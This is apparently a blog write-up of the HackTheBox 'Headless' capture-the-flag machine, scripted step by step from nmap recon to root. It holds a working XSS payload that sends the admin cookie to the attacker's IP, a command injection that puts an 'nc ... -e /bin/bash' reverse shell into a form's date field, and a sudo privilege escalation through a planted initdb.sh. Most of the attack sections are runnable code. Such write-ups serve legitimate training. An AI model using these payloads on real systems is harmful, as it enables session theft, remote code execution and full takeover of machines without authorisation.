Post

HackTheBox Headless Writeup

Posted
By x3ric
2 min read

Explore the fundamentals of cybersecurity in the Headless Capture The Flag (CTF) challenge, an easy-level experience, ideal for beginners! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible and perfect for those new to CTFs.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1

10.10.11.8 headless.htb

Script to add hosts automatically

1
2
3

ip="10.10.11.8"
domain="headless.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV headless.htb

1
2
3
4
5
6
7
8
9
10
11
12
13

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-21 18:38 CEST
Nmap scan report for headless.htb (10.10.11.8)
Host is up (0.057s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open  http    Werkzeug httpd 2.2.2 (Python 3.11.2)
|_http-title: Under Construction
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Port 22: SSH
  • Port 5000: Werkzeug HTTP server (Python-based)

Useful URLs:

Exploiting XSS

1
2
3
4
5
6
7
8
9
10
11
12
13
14

echo "\nstart listening from the server\n python -m http.server 5000\nWait until the response appear"
read
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
payload='<script>var i=new Image(); i.src="http://'$vpnip':5000/?cookie="+btoa(document.cookie);</script>'
curl -v -s 'http://headless.htb:5000/support' -X POST -H 'User-Agent: '$payload'' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://headless.htb:5000' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' \
-H "Content-Length: 112" \
-H 'Referer: http://headless.htb:5000/support' \
-H 'Cookie: is_admin='$(curl -sD - http://headless.htb:5000/ | grep -oP '(?<=is_admin=)[^;]+')'' \
-H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' \
--data-raw 'fname=test&lname=test&email=test%40headless.htb&phone=0000000000&message=%3Cscript%3Ealert
%281%29%3C%2Fscript%3E'

Wait for the message: "GET /?cookie=". After retrieving the cookie, you can close the listener.

Remote Code Execution (RCE)

1
2
3
4
5
6
7
8
9
10
11
12
13

echo -en "\n1st start a listeners\n nc -lvnp 9001\n Admin Coockie Base64 ->"
read coockie
coockiedecrypted=$(echo $coockie | base64 -d)
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
curl -sS 'http://headless.htb:5000/dashboard' -X POST \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://headless.htb:5000' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' \
-H 'Referer: http://headless.htb:5000/dashboard' \
-H 'Cookie: '$coockiedecrypted'' \
-H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' \
--data-raw 'date=2023-09-15;nc+'$vpnip'+9001+-e+/bin/bash'

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

1

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

1

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

1

export TERM=xterm;

Privilege Escalation

After running sudo -l, you may notice the following:

1

(ALL) NOPASSWD: /usr/bin/syscheck

This means you can run /usr/bin/syscheck with sudo privileges. To exploit this, follow these steps:

Check the content of /usr/bin/syscheck:

1

cat /usr/bin/syscheck

Exploit the script:

1
2
3
4

cd /tmp
echo -e '#!/bin/bash\n/bin/bash' > /tmp/initdb.sh
chmod +x /tmp/initdb.sh
sudo /usr/bin/syscheck

You should now have root access. Display the root flag:

1
2

id
cat /root/root.txt
ctf
htb cft writeup linux
This post is licensed under CC BY 4.0 by the author.